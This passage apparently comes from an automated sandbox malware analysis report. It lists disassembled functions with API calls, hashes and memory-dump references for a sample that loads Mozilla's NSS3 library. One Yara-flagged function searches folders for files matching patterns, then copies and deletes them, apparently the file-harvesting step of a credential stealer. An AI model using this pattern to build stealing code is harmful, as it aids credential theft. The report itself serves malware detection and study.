                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3725328900-0
                                                                                                                                                                                                              • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                              • Instruction ID: 36538135cb837b229ef298a4fb2d80aed336b715513239defa51ab1010806203
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A31DB729057829BEB01CF66D880656F7E4FFA5318B14822DD81C47F01E771F4A4CB81
                                                                                                                                                                                                              Function 6CAC1EC0 Relevance: 6.1, APIs: 4, Instructions: 74timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6CAC4C64,?,-00000004), ref: 6CAC1EE2
                                                                                                                                                                                                                • Part of subcall function 6CB21820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6CAC1D97,?,?), ref: 6CB21836
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CAC4C64,?,-00000004), ref: 6CAC1F13
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,6CAC4CA0,?,?,?,?,?,?,00000000,00000000,?,6CAC4C64,?,-00000004), ref: 6CAC1F37
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,6CAC4C1C,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAC4C64,?,-00000004), ref: 6CAC1F53
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TimeUtil$Choice_Decode$GeneralizedTime_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3216063065-0
                                                                                                                                                                                                              • Opcode ID: e01798e388da69c895aef0b659c8f8e0b2080c48e2b11490347753d5df1e506e
                                                                                                                                                                                                              • Instruction ID: 23b4b332252181f4581f8dc7acd150823a236e53cc39d520568aa4fb88a4549d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e01798e388da69c895aef0b659c8f8e0b2080c48e2b11490347753d5df1e506e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F219271704346AFC700CE2ADD40AABB7E9EB85699F44092DE948C3A40F331E958CBD3
                                                                                                                                                                                                              Function 009366A1 Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 009366E9
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956B54), ref: 00936706
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00936719
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956B58), ref: 0093672B
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093605A
                                                                                                                                                                                                                • Part of subcall function 00936013: FindFirstFileA.KERNEL32(?,?), ref: 00936071
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956ABC), ref: 00936092
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956AC0), ref: 009360AC
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 009360D3
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956647), ref: 009360E7
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 00936104
                                                                                                                                                                                                                • Part of subcall function 00936013: PathMatchSpecA.SHLWAPI(?,?), ref: 00936131
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?), ref: 00936167
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956AD8), ref: 00936179
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 0093618C
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956ADC), ref: 0093619E
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 009361B2
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093611B
                                                                                                                                                                                                                • Part of subcall function 00936013: CopyFileA.KERNEL32(?,?,00000001), ref: 0093626B
                                                                                                                                                                                                                • Part of subcall function 00936013: DeleteFileA.KERNEL32(?), ref: 009362DF
                                                                                                                                                                                                                • Part of subcall function 00936013: FindNextFileA.KERNEL32(?,?), ref: 00936341
                                                                                                                                                                                                                • Part of subcall function 00936013: FindClose.KERNEL32(?), ref: 00936355
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2104210347-0
                                                                                                                                                                                                              • Opcode ID: e43da312260e7b6b42cc99f8939677cebdbe64f80671b1b4a0c3672bfad767e1
                                                                                                                                                                                                              • Instruction ID: 444031651154a74f88375e04514ce3b301c8049d4862403770e692eef67d8b93
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e43da312260e7b6b42cc99f8939677cebdbe64f80671b1b4a0c3672bfad767e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B218E7590012CAFCB50EB60DC46AD977B8EF58304F4044E5F988A7250EEB09AD58F51
                                                                                                                                                                                                              Function 6CB32DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB32E08
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6CB32E1C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CB32E3B
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB32E95
                                                                                                                                                                                                                • Part of subcall function 6CB21200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CAC88A4,00000000,00000000), ref: 6CB21228
                                                                                                                                                                                                                • Part of subcall function 6CB21200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CB21238
                                                                                                                                                                                                                • Part of subcall function 6CB21200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CAC88A4,00000000,00000000), ref: 6CB2124B
                                                                                                                                                                                                                • Part of subcall function 6CB21200: PR_CallOnce.NSS3(6CC22AA4,6CB212D0,00000000,00000000,00000000,?,6CAC88A4,00000000,00000000), ref: 6CB2125D
                                                                                                                                                                                                                • Part of subcall function 6CB21200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CB2126F
                                                                                                                                                                                                                • Part of subcall function 6CB21200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CB21280
                                                                                                                                                                                                                • Part of subcall function 6CB21200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CB2128E
                                                                                                                                                                                                                • Part of subcall function 6CB21200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CB2129A
                                                                                                                                                                                                                • Part of subcall function 6CB21200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CB212A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1441289343-0
                                                                                                                                                                                                              • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                              • Instruction ID: cd91bc7410a1d3173c8a9c182a74cb9fb8a7251ae0d0c68fe34feaa5767aaca0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A210775D003E14BE700CF549D45BAA3764AFA170CF151269DD0C5B782F7B6E98482D3
                                                                                                                                                                                                              Function 6CAEACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CERT_NewCertList.NSS3 ref: 6CAEACC2
                                                                                                                                                                                                                • Part of subcall function 6CAC2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CAC2F0A
                                                                                                                                                                                                                • Part of subcall function 6CAC2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CAC2F1D
                                                                                                                                                                                                                • Part of subcall function 6CAC2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CAC0A1B,00000000), ref: 6CAC2AF0
                                                                                                                                                                                                                • Part of subcall function 6CAC2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAC2B11
                                                                                                                                                                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6CAEAD5E
                                                                                                                                                                                                                • Part of subcall function 6CB057D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CACB41E,00000000,00000000,?,00000000,?,6CACB41E,00000000,00000000,00000001,?), ref: 6CB057E0
                                                                                                                                                                                                                • Part of subcall function 6CB057D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CB05843
                                                                                                                                                                                                              • CERT_DestroyCertList.NSS3(?), ref: 6CAEAD36
                                                                                                                                                                                                                • Part of subcall function 6CAC2F50: CERT_DestroyCertificate.NSS3(?), ref: 6CAC2F65
                                                                                                                                                                                                                • Part of subcall function 6CAC2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAC2F83
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAEAD4F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 132756963-0
                                                                                                                                                                                                              • Opcode ID: a655173367fd58b5c5cdd2f887c770408d35bb35285c6dda8a556c39dc1d5a09
                                                                                                                                                                                                              • Instruction ID: b636b34acd84e979993c4974c8c5afd6916108ccb9bba246f180a28d616a7407
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a655173367fd58b5c5cdd2f887c770408d35bb35285c6dda8a556c39dc1d5a09
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921EBB1D001088BEF11DF65D9455EE7BB5EF49218F094168D809B7700FB31AE99DBE2
                                                                                                                                                                                                              Function 6CB13C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB13C9E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB13CAE
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB13CEA
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB13D02
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 284873373-0
                                                                                                                                                                                                              • Opcode ID: 419aedc552cf9881c0474eea55b8bf7a446c474e788f92f7bac59a584fb589f5
                                                                                                                                                                                                              • Instruction ID: a788bf245e907e76728cf24b19749211e57bcc1ff9a14a8f2b70f329e617feb7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 419aedc552cf9881c0474eea55b8bf7a446c474e788f92f7bac59a584fb589f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75118179A04254AFDB00EF29DC49E9A3778EF09368F154164ED089BB12E731ED94CBE1
                                                                                                                                                                                                              Function 6CB1ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CB1F0AD,6CB1F150,?,6CB1F150,?,?,?), ref: 6CB1ECBA
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAC87ED,00000800,6CABEF74,00000000), ref: 6CB21000
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PR_NewLock.NSS3(?,00000800,6CABEF74,00000000), ref: 6CB21016
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PL_InitArenaPool.NSS3(00000000,security,6CAC87ED,00000008,?,00000800,6CABEF74,00000000), ref: 6CB2102B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CB1ECD1
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CB1ED02
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2116E
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CB1ED5A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2957673229-0
                                                                                                                                                                                                              • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                              • Instruction ID: 32ddc5037a43fb70a9382c5a06571edc7e788bb130e0b1b5ad7e2bc942036929
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6221F2B19147C25BE700CF21D908B6AB7E4EFA5308F158216E81C87E61EB70E590C7D1
                                                                                                                                                                                                              Function 6CB4EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CB37FFA,?,6CB39767,?,8B7874C0,0000A48E), ref: 6CB4EDD4
                                                                                                                                                                                                              • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CB37FFA,?,6CB39767,?,8B7874C0,0000A48E), ref: 6CB4EDFD
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CB37FFA,?,6CB39767,?,8B7874C0,0000A48E), ref: 6CB4EE14
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,6CB39767,00000000,00000000,6CB37FFA,?,6CB39767,?,8B7874C0,0000A48E), ref: 6CB4EE33
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3903481028-0
                                                                                                                                                                                                              • Opcode ID: 51d4fa6fc62cb4876c7d66fa6d04dd4ef952c77f45c562ca80784ea0966322b6
                                                                                                                                                                                                              • Instruction ID: b73761efc72e14b24903bc96f4a7d1c337a68c392461af267158feaba069a1f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51d4fa6fc62cb4876c7d66fa6d04dd4ef952c77f45c562ca80784ea0966322b6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2311A3B1A487D6ABEB50DE65DC84F0AF3A8FB0435CF208531E91982A04E330F46497E2
                                                                                                                                                                                                              Function 6CAE8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 284873373-0
                                                                                                                                                                                                              • Opcode ID: 13942de03916deba3dda743702fc6a9e7ddf95e90095570b74e5b3a7b30f7f47
                                                                                                                                                                                                              • Instruction ID: 0cac7d178ed86c98907b17aa5cc559eb5968d8265e3022b2cfd8475e380bad52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13942de03916deba3dda743702fc6a9e7ddf95e90095570b74e5b3a7b30f7f47
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3118F71605A009BD700BF78D584659BBF4FF09314F054929DC88D7B00E730E894CBD1
                                                                                                                                                                                                              Function 6CB6AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CB55F17,?,?,?,?,?,?,?,?,6CB5AAD4), ref: 6CB6AC94
